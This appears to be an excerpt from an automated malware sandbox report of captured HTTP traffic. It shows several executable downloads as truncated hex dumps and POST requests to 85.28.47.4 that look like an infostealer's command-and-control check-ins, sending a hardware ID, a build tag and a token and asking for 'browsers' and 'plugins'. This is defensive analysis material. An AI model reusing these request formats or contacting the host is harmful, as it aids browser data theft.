Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 16:08:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 16:08:45 GMTContent-Type: application/octet-streamContent-Length: 1938944Last-Modified: Wed, 03 Jul 2024 15:31:31 GMTConnection: keep-aliveETag: "66856ed3-1d9600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 c0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4c 00 00 04 00 00 19 a4 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 aa 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 aa 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 78 7a 65 71 72 77 6e 00 80 1a 00 00 30 32 00 00 7e 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 67 6f 61 68 78 6f 75 00 10 00 00 00 b0 4c 00 00 04 00 00 00 70 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4c 00 00 22 00 00 00 74 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 03 Jul 2024 16:09:05 GMTContent-Type: application/octet-streamContent-Length: 2545664Last-Modified: Wed, 03 Jul 2024 15:01:11 GMTConnection: keep-aliveETag: "668567b7-26d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 84 8e bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 30 9d 00 7a 0e 00 00 9c 3e 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 40 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 b0 22 00 00 00 9d 00 00 a4 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAKEHJDHJKEBFHJEGDHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 35 44 41 37 38 41 38 42 31 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 41 4b 45 48 4a 44 48 4a 4b 45 42 46 48 4a 45 47 44 2d 2d 0d 0a Data Ascii: ------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="hwid"75DA78A8B1E73099305215------IDAAKEHJDHJKEBFHJEGDContent-Disposition: form-data; name="build"jony------IDAAKEHJDHJKEBFHJEGD--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"343aca5d07e57c28438fee90bf2f5cd93058758749f437a1bceac8616901e7891266c402------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="message"browsers------GDHIDHIEGIIIECAKEBFB--
Source: global traffic	HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 61 63 61 35 64 30 37 65 35 37 63 32 38 34 33 38 66 65 65 39 30 62 66 32 66 35 63 64 39 33 30 35 38 37 35 38 37 34 39 66 34 33 37 61 31 62 63 65 61 63 38 36 31 36 39 30 31 65 37 38 39 31 32 36 36 63 34 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; 